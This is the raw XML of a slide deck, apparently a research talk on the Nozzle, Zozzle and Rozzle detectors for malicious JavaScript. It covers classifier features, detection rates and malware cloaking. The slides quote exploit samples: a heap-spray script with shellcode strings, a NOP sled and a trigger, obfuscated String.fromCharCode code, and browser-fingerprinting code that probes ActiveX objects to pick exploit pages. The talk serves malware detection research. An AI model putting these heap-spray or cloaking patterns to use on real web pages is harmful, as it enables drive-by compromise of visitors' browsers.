            <a:xfrm flipH="1">
              <a:off x="5105400" y="2286000"/>
              <a:ext cx="732653" cy="1066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257800" y="1893209"/>
              <a:ext cx="3539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Normalized attack surface (NAS)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="20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752600" y="2602468"/>
            <a:ext cx="657552" cy="2348523"/>
            <a:chOff x="1752600" y="2602468"/>
            <a:chExt cx="657552" cy="2348523"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="TextBox 51"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1752600" y="2602468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good</a:t>
              </a:r>
              <a:endParaRPr lang="en-US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1981201" y="3124200"/>
              <a:ext cx="57577" cy="18267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733800" y="2906786"/>
            <a:ext cx="1032137" cy="1463046"/>
            <a:chOff x="3733800" y="2906786"/>
            <a:chExt cx="1032137" cy="1463046"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="58" name="TextBox 57"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4227007" y="400050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bad</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="70" name="Straight Arrow Connector 69"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="58" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="3733800" y="2906786"/>
              <a:ext cx="762672" cy="10937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74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Nozzle Experimental Summary</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b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5924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D1453-4CAE-459E-B186-079CC19DEE6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286000"/>
            <a:ext cx="7772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Bing finds 1,000s of malicious sites using Nozzle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Very few false </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>positives (10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>-9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> FP rate)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Increased Bing’s detection capability two-fold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Detection Landscape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759311"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2133600" y="16002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170" name="Picture 2" descr="http://users.eecs.northwestern.edu/~ganghua/ghimage/Microsoft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63221" y="3435021"/>
            <a:ext cx="3962400" cy="9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81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E48C75-D016-4F08-9F51-B3D240ACF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BE48C75-D016-4F08-9F51-B3D240ACF8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0CD44F-31FA-458A-99A0-9DA364AC4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170CD44F-31FA-458A-99A0-9DA364AC4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8C0AC3-421E-4976-8531-27C2CAAC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F98C0AC3-421E-4976-8531-27C2CAAC5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6B8372-1AC1-4C30-9C91-27561FA2B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836B8372-1AC1-4C30-9C91-27561FA2B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A413BF-0915-4049-A5C9-7FD42C018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ACA413BF-0915-4049-A5C9-7FD42C018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586B4C-DC6C-42F1-8E4D-88C4E633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74586B4C-DC6C-42F1-8E4D-88C4E633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074874-D740-4421-B6B9-9D999C367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69074874-D740-4421-B6B9-9D999C367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1C02D-E7D5-45FC-B787-772B2C997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16E1C02D-E7D5-45FC-B787-772B2C997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graphicEl>
                                              <a:dgm id="{EBE48C75-D016-4F08-9F51-B3D240ACF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graphicEl>
                                              <a:dgm id="{170CD44F-31FA-458A-99A0-9DA364AC4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graphicEl>
                                              <a:dgm id="{F98C0AC3-421E-4976-8531-27C2CAAC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graphicEl>
                                              <a:dgm id="{836B8372-1AC1-4C30-9C91-27561FA2B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graphicEl>
                                              <a:dgm id="{ACA413BF-0915-4049-A5C9-7FD42C018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graphicEl>
                                              <a:dgm id="{74586B4C-DC6C-42F1-8E4D-88C4E633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>
                                            <p:graphicEl>
                                              <a:dgm id="{69074874-D740-4421-B6B9-9D999C367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051E-6 L -0.475 -3.4505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>
                                            <p:graphicEl>
                                              <a:dgm id="{16E1C02D-E7D5-45FC-B787-772B2C997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23610" r="53472" b="10557"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="266700" y="1619250"/>
            <a:ext cx="3924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Detection Landscape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187157"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1447800" y="16002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ipt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Shellcode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shellcode=unescape(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‘%u9090%u9090%u9090%u9090%uceba%u11fa%u291f%ub1c9%udb33 […]′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bigblock=unescape(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="11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“%u0D0D%u0D0D”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headersize=20;shellcodesize=headersize+shellcode.length;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A50021"/>
                </a:solidFill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(bigblock.length&lt;shellcodesize){bigblock+=bigblock;}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heapshell=bigblock.substring(0,shellcodesize);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nopsled=bigblock.substring(0,bigblock.length-shellcodesize);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100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(nopsled.length+shellcodesize&lt;0×25000){nopsled=nopsled+nopsled+heapshell}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Spray</a:t>
            </a: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 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spray=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new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Array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();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(i=0;i&lt;500;i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++){spray[i]=nopsled+shellcode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;}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty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// Trigger</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100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function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trigger(){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varbdy = document.createElement(‘body’);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varbdy.addBehavior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(‘#default#userData’);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document.appendChild(varbdy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try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</a:t>
            </a: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(iter=0; iter&lt;10; iter++) {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  varbdy.setAttribute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(‘s’,window);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  }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} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="11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catch(e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){ }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  window.status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+=”;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}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 smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(‘butid’).onclick();</a:t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r>
              <a:rPr lang="en-US" sz="1100" dirty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dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="11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9" name="tokens1" title="tokens1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457198" y="685800"/>
            <a:ext cx="9144000" cy="579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24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    </a:t>
            </a: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shellcode unescape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bigblock unescape  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1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%u0D0D%u0D0D</a:t>
            </a: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            shellcodesize            shellcode.length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        bigblock.substring   shellcodesize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nopsled bigblock.substring   bigblock.length shellcodesize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    nopsled.length shellcodesize          nopsled nopsled nopsled heapshell</a:t>
            </a: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</a:t>
            </a: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r>
              <a:rPr lang="en-US" sz="11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	    </a:t>
            </a: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spray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                 spray    nopsled shellcode</a:t>
            </a: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endParaRPr lang="en-US" sz="11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spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pP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varbdy.addBehavior  #default#userData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document.appendChild varbdy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    varbdy.setAttribute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>	                         butid</a:t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r>
              <a:rPr lang="en-US" sz="1100" b="1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sz="1100" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="11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Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Zozzle: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Static Malware Detection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019800" y="1600200"/>
            <a:ext cx="26670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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Train a classifier to recognize malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Start with thousands of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>benign</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> labeled samples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Classify JavaScript code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4" grpId="2" build="p"/>
      <p:bldP spid="9" grpId="0"/>
      <p:bldP spid="9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ular Callout 22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OlOlll=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"(x)"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 String"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OlllOO=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"tion"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OlOllO=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"Code(x)}"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OllOOO=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"Char"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OlllOl=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"func"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 l = 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OllOOl=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".from"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"{return"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"var"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(Olllll+OllllO+OlllOl+OlllOO+OlOlll+OllOll+OllOlO+OllOOl+OllOOO+OlOllO);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Obfuscation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648200" y="1600201"/>
            <a:ext cx="4038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String.fromCharCode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(x);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3429000"/>
            <a:ext cx="4191000" cy="3124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shellcode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"%u54EB%u758B…"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"%u0c0c%u0c0c"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bigblock.length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block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bigblock.substring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bigblock.length-slackspace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block.length+slackspace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0x40000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block = block + block +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fillblock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memory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Array(); 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(x=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 x&lt;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300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 x++)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memory[x] = block + shellcode; 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sz="half" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5105400" y="2514600"/>
            <a:ext cx="4038600" cy="838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O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(m){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String.fromCharCode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Math.floor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(m / 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10000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/ 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1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486400"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangular Callout 6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l(79)+l(61)+l(102)+l(117)+l(110)+l(99)+l(116)+l(105)+l(111)+l(110)+l(40)+l(109)+l(41)+l(123)+l(114)+l(101)+l(116)+l(117)+l(114)+l(110)+l(32)+l(83)+l(116)+l(114)+l(105)+l(110)+l(103)+l(46)+l(102)+l(114)+l(111)+l(109)+l(67)+l(104)+l(97)+l(114)+l(67)+l(111)+l(100)+l(101)+l(40)+l(77)+l(97)+l(116)+l(104)+l(46)+l(102)+l(108)+l(111)+l(111)+l(114)+l(40)+l(109)+l(47)+l(49)+l(48)+l(48)+l(48)+l(48)+l(41)+l(47)+l(50)+l(41)+l(59)+l(125));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1" grpId="0" build="p"/>
      <p:bldP spid="13" grpId="0" build="p"/>
      <p:bldP spid="8" grpId="0" build="p"/>
      <p:bldP spid="7" grpId="0" animBg="1"/>
      <p:bldP spid="7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10800000">
            <a:off x="3393473" y="4536265"/>
            <a:ext cx="28956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Runtime </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>Deobfuscation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t> via Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Unfolding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1047750" y="2164749"/>
            <a:ext cx="2209800" cy="2838032"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -20833"/>
              <a:gd name="adj2" fmla="val 56794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10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778" y="5201728"/>
            <a:ext cx="741872" cy="741872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6439414" y="2821765"/>
            <a:ext cx="1713986" cy="22098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JavaScript runtime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in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browser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46438" y="3040840"/>
            <a:ext cx="1752600" cy="762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Deobfuscator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93473" y="3202765"/>
            <a:ext cx="4572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829814" y="3202765"/>
            <a:ext cx="4572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6959" y="2431240"/>
            <a:ext cx="2077479" cy="2421748"/>
            <a:chOff x="3127288" y="4106474"/>
            <a:chExt cx="2077479" cy="2421748"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="96" name="Rectangular Callout 95"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3127288" y="4106474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7" name="Rectangular Callout 96"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4252267" y="4106474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8" name="Rectangular Callout 97"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3127288" y="5499731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9" name="Rectangular Callout 98"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4252267" y="5499731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6459" y="2073626"/>
            <a:ext cx="2342120" cy="3020277"/>
            <a:chOff x="3590410" y="3057525"/>
            <a:chExt cx="2342120" cy="3020277"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="100" name="Group 99"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4807551" y="3057525"/>
              <a:ext cx="1124979" cy="1393257"/>
              <a:chOff x="3200400" y="4048125"/>
              <a:chExt cx="2077479" cy="2421748"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="101" name="Rectangular Callout 100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2" name="Rectangular Callout 101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3" name="Rectangular Callout 102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4" name="Rectangular Callout 103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590410" y="3086100"/>
              <a:ext cx="1124979" cy="1393257"/>
              <a:chOff x="3200400" y="4048125"/>
              <a:chExt cx="2077479" cy="2421748"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="106" name="Rectangular Callout 105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7" name="Rectangular Callout 106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8" name="Rectangular Callout 107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9" name="Rectangular Callout 108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3590410" y="4684545"/>
              <a:ext cx="1124979" cy="1393257"/>
              <a:chOff x="3200400" y="4048125"/>
              <a:chExt cx="2077479" cy="2421748"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="111" name="Rectangular Callout 110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2" name="Rectangular Callout 111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3" name="Rectangular Callout 112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4" name="Rectangular Callout 113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4800600" y="4684545"/>
              <a:ext cx="1124979" cy="1393257"/>
              <a:chOff x="3200400" y="4048125"/>
              <a:chExt cx="2077479" cy="2421748"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="116" name="Rectangular Callout 115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7" name="Rectangular Callout 116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8" name="Rectangular Callout 117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9" name="Rectangular Callout 118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2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Zozzle Training &amp; Application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72287" y="5093656"/>
            <a:ext cx="1676786" cy="1764344"/>
            <a:chOff x="5410200" y="956449"/>
            <a:chExt cx="3604923" cy="2842010"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="Picture 5" descr="http://www.applewooddata.co.uk/Images/Server%20Farm%20front%20Veiw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956449"/>
              <a:ext cx="2988313" cy="20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http://userlogos.org/files/logos/Rog/bing.com_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72" y="2461350"/>
              <a:ext cx="2111251" cy="133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ts1.mm.bing.net/images/thumbnail.aspx?q=958006756880&amp;id=03630b615590ca612b2c56d882091a27&amp;url=http%3a%2f%2fwww.techmagnews.com%2fwp-content%2fuploads%2fimages%2fFacebook_No_Longer_Supports_Internet_Explorer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35" y="5232076"/>
            <a:ext cx="945649" cy="10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8800" y="1634244"/>
            <a:ext cx="2914476" cy="1876530"/>
            <a:chOff x="1828800" y="1634244"/>
            <a:chExt cx="2914476" cy="1876530"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2052" name="Picture 4" descr="http://www.asia.ru/images/target/photo/51643579/Watering_C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1178">
              <a:off x="2870759" y="2190608"/>
              <a:ext cx="1872517" cy="132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28800" y="1634244"/>
              <a:ext cx="1238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malicious samples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(1K)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50024" y="1604435"/>
            <a:ext cx="2941426" cy="1758113"/>
            <a:chOff x="4850024" y="1604435"/>
            <a:chExt cx="2941426" cy="1758113"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2050" name="Picture 2" descr="http://t1.gstatic.com/images?q=tbn:ANd9GcSN9DPnh2MvOKNOVH4jP7D4bOiGgiIgZvfuxghPcqjs06oWZwW1O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3238">
              <a:off x="4850024" y="1752600"/>
              <a:ext cx="1826394" cy="1609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553200" y="1604435"/>
              <a:ext cx="1238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benign samples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(7K)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76600" y="3709797"/>
            <a:ext cx="2743200" cy="1232579"/>
            <a:chOff x="3276600" y="3709797"/>
            <a:chExt cx="2743200" cy="123257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709797"/>
              <a:ext cx="1778288" cy="1232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437" y="3790269"/>
              <a:ext cx="899363" cy="10716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4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Naïve Bayes </a:t>
            </a:r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25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4728273" y="2131905"/>
            <a:ext cx="3876675" cy="3313671"/>
            <a:chOff x="5067300" y="2629929"/>
            <a:chExt cx="3876675" cy="3313671"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="63" name="Oval 62"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6058801" y="3857625"/>
              <a:ext cx="550648" cy="550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144526" y="3921001"/>
              <a:ext cx="342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5067300" y="2629929"/>
              <a:ext cx="1181100" cy="11038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067557" y="3048451"/>
              <a:ext cx="1076969" cy="800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5067557" y="3413525"/>
              <a:ext cx="991244" cy="5198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5067557" y="3733800"/>
              <a:ext cx="939371" cy="2972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067557" y="4132949"/>
              <a:ext cx="93937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067557" y="4242967"/>
              <a:ext cx="939371" cy="2628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5067557" y="4326176"/>
              <a:ext cx="991244" cy="5506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5067557" y="4425458"/>
              <a:ext cx="1076969" cy="8395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5067557" y="4483683"/>
              <a:ext cx="1180843" cy="10789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067557" y="4533900"/>
              <a:ext cx="1266568" cy="1409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6656928" y="4132949"/>
              <a:ext cx="4528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115175" y="3882444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P(malicious)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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7407"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="990600" y="1788160"/>
          <a:ext cx="3525538" cy="4079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45186"/>
                <a:gridCol w="1380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P(malicious)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string:0c0c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function:shellcode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loop:memory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Function:ActiveX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try:activex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if:msie</a:t>
                      </a:r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 7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function:Array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function:unescape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loop:+=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loop:nop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" name="Rectangular Callout 95"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6317901" y="1540202"/>
            <a:ext cx="968578" cy="1143638"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -64937"/>
              <a:gd name="adj2" fmla="val 105542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4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40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ke-msn-manu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ke-msn-aut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Zozzle: Detection on a Web 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017821"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1203960" y="1469136"/>
          <a:ext cx="6781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295400" y="5715000"/>
            <a:ext cx="6629400" cy="838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Thousands of malware sites daily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170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23610" r="53472" b="10557"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="266700" y="1619250"/>
            <a:ext cx="3924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Detection Landscape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894909"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1447800" y="16002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Blacklisting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Malware in Search Results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6032" y="2255320"/>
            <a:ext cx="3096768" cy="4221680"/>
            <a:chOff x="6302085" y="956449"/>
            <a:chExt cx="2713038" cy="2842010"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13" name="Picture 12" descr="http://www.applewooddata.co.uk/Images/Server%20Farm%20front%20Veiw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6"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6302085" y="956449"/>
              <a:ext cx="2096428" cy="20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://userlogos.org/files/logos/Rog/bing.com_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72" y="2461350"/>
              <a:ext cx="2111251" cy="133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2" name="Picture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 bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="2033016"/>
            <a:ext cx="8172976" cy="407517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29200" y="2667000"/>
            <a:ext cx="3962400" cy="1752600"/>
            <a:chOff x="990601" y="3429000"/>
            <a:chExt cx="3962400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Rectangular Callout 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="990601" y="3429000"/>
              <a:ext cx="3962400" cy="1752600"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -69140"/>
                <a:gd name="adj2" fmla="val 4065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6" y="3543300"/>
              <a:ext cx="3676650" cy="152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70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800" y="1801201"/>
            <a:ext cx="7772400" cy="45233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tIns="182880" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/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navigator.userAgent.toLowerCase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indexOf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x6D"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"\x73\x69\x65"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"\x20\x36"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)&gt;0)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=x6.htm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navigator.userAgent.toLowerCase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indexOf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x6D"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"\x73"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"\x69"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"\x65"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"\x20"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"\x37"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)&gt;0)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=x7.htm&gt;&lt;/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ActiveXObject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"Sh"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"ockw"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"av"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"e"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Fl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+[…]);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finally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(a!=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"[object Error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]"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=svfl9.htm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c;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f=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ActiveXObject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"O"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"\x57\x43"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x31\x30\x2E\x53"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+[…]);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finally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(c!=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"[object Error]"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{ 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aacc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=of.htm&gt;&lt;/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setTimeout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aacc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)"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3500);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 }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5194494" y="3970401"/>
            <a:ext cx="3467974" cy="1200150"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 2286"/>
              <a:gd name="adj2" fmla="val -125629"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom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"\x6D"+"\x73"+"\x69"+"\x65"+"\x20"+"\x37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endParaRPr lang="de-DE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"msie 7"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-152400" y="2667000"/>
            <a:ext cx="5029200" cy="1200150"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 24236"/>
              <a:gd name="adj2" fmla="val 192392"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom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"O"+"\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x57\x43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"+"\x31\x30\x2E\x53"+"pr"+"ea"+"ds"+"he"+"et"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"OWC10.Spreadsheet"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Limitations of Zozzle</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6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990600" y="914400"/>
            <a:ext cx="3691128" cy="1200150"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 87601"/>
              <a:gd name="adj2" fmla="val 51553"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom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"\x6D"+"\x73\x69\x65"+"\x20\x36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endParaRPr lang="de-DE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"msie 6"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26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Next: Rozzle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72954" y="1801201"/>
            <a:ext cx="8185246" cy="5056799"/>
            <a:chOff x="272954" y="1801201"/>
            <a:chExt cx="8185246" cy="5056799"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="TextBox 20"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="685800" y="1801201"/>
              <a:ext cx="7772400" cy="4523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tIns="182880" rtlCol="0" anchor="t" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/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navigator.userAgent.toLowerCase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().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indexOf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(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x6D"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"\x73\x69\x65"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"\x20\x36"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)&gt;0)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=x6.htm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navigator.userAgent.toLowerCase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().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indexOf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(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x6D"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"\x73"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"\x69"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"\x65"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"\x20"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"\x37"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)&gt;0)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=x7.htm&gt;&lt;/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try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b="1" dirty="0" err="1" smtClean="0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a;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aa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=new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ActiveXObject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"Sh"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"ockw"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"av"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"e"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</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1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Fl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+[…]);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catch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{ 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finally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(a!=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"[object Error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]"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)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 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" i="1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=svfl9.htm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try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c;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f=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new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ActiveXObject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"O"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"\x57\x43"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x31\x30\x2E\x53"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+[…]);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catch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{ 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finally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(c!=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"[object Error]"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{ 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aacc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= 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=of.htm&gt;&lt;/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&gt;";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setTimeout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aacc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)", 3500);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 } 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5" name="Picture 2" descr="http://www.theplaceforitall.com/portablefirefox/images/firefox-log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8" b="22000"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="272954" y="5372100"/>
              <a:ext cx="1632045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3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Typical Malware Cloaking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="48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95" y="1610204"/>
            <a:ext cx="5792009" cy="45059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390650" y="3048000"/>
            <a:ext cx="5753100" cy="22860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90650" y="5334000"/>
            <a:ext cx="5753100" cy="22860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09700" y="3581400"/>
            <a:ext cx="5753100" cy="22860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More Complex Fingerprinting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 smtClean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15" y="1386481"/>
            <a:ext cx="6279590" cy="5974756"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Content Placeholder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15" y="7315200"/>
            <a:ext cx="6271367" cy="45259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48400" y="2838976"/>
            <a:ext cx="2667000" cy="1946506"/>
            <a:chOff x="304800" y="2721443"/>
            <a:chExt cx="2667000" cy="1946506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2721443"/>
              <a:ext cx="2667000" cy="1701068"/>
              <a:chOff x="-304800" y="3581400"/>
              <a:chExt cx="3962400" cy="2527301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52600" y="3581400"/>
                <a:ext cx="1905000" cy="2222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62000" y="3733800"/>
                <a:ext cx="1905000" cy="2222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304800" y="3886200"/>
                <a:ext cx="1905000" cy="2222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13" y="4439349"/>
              <a:ext cx="20859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52400" y="3753659"/>
            <a:ext cx="473321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Fingerprint: Q0193807F127J14</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Right Arrow 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5181600" y="3829024"/>
            <a:ext cx="838200" cy="37249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-0.0007 -0.6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8449 L 0.00035 -0.7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57200" y="5257800"/>
            <a:ext cx="8305800" cy="1143000"/>
            <a:chOff x="457200" y="3886200"/>
            <a:chExt cx="8305800" cy="1371600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Rounded Rectangle 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="3886200"/>
              <a:ext cx="4114800" cy="1371600"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 1253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91440" tIns="91440" bIns="91440" rtlCol="0" anchor="ctr" anchorCtr="0"/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000" dirty="0"/>
                <a:t>Execute </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
                <a:t>branches </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
                <a:t>sequentially</a:t>
              </a:r>
              <a:r>
